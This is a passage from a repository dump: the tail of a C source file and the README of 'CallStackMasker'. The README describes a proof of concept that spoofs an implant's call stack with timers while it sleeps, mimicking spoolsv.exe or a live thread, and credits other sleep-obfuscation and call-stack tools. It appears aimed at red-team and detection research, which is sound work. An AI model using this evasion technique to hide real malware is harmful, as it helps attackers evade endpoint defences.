1116 | 1117 | Cleanup: 1118 | LocalFree(pBuffer); 1119 | return status; 1120 | } 1121 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # CallStackMasker 2 | 3 | This repository demonstrates a PoC technique for dynamically spoofing call stacks using timers. Prior to our implant sleeping, we can queue up timers to overwrite its call stack with a fake one and then restore the original before resuming execution. Hence, in the same way we can mask memory belonging to our implant during sleep, we can also mask the call stack of our main thread. 4 | 5 | For a full technical walkthrough see the accompanying blog post here: https://www.cobaltstrike.com/blog/behind-the-mask-spoofing-call-stacks-dynamically-with-timers/. 6 | 7 | By default the PoC will mimic a static call stack taken from spoolsv.exe: 8 | 9 | ![call_stack_masker_static](https://user-images.githubusercontent.com/108275364/218521821-0b0dfa07-e56f-4741-ae59-464e35a50b78.png) 10 | 11 | If the `--dynamic` flag is provided, CallStackMasker will enumerate all the accessible threads, find one in the desired state (WaitForSingleObjectEx), and mimic its call stack and start address. This is demonstrated below: 12 | 13 | ![call_stack_masker_dynamic_1](https://user-images.githubusercontent.com/108275364/218522095-1fad0f7d-0903-4c95-91ac-05bf068aad20.png) 14 | ![call_stack_masker_dynamic_3](https://user-images.githubusercontent.com/108275364/218522043-f98c3399-8265-4735-9861-2aeddf2346c8.png) 15 | 16 | NB As a word of caution, this PoC was tested on the following Windows build: 17 | 18 | 22h2 (19045.2486) 19 | 20 | It has not been tested on any other versions and may break on different Windows builds. 21 | 22 | # Credit 23 | * Ekk0 for the sleep obfuscation technique this PoC is based on (https://github.com/Cracked5pider/Ekko). 24 | * WithSecureLabs' CallStackSpoofer (https://github.com/WithSecureLabs/CallStackSpoofer) & TickTock (https://github.com/WithSecureLabs/TickTock) for example code on manipulating call stacks. 25 | * Hunt-Sleeping-Beacons (https://github.com/thefLink/Hunt-Sleeping-Beacons) for example thread enumeration code. 26 | --------------------------------------------------------------------------------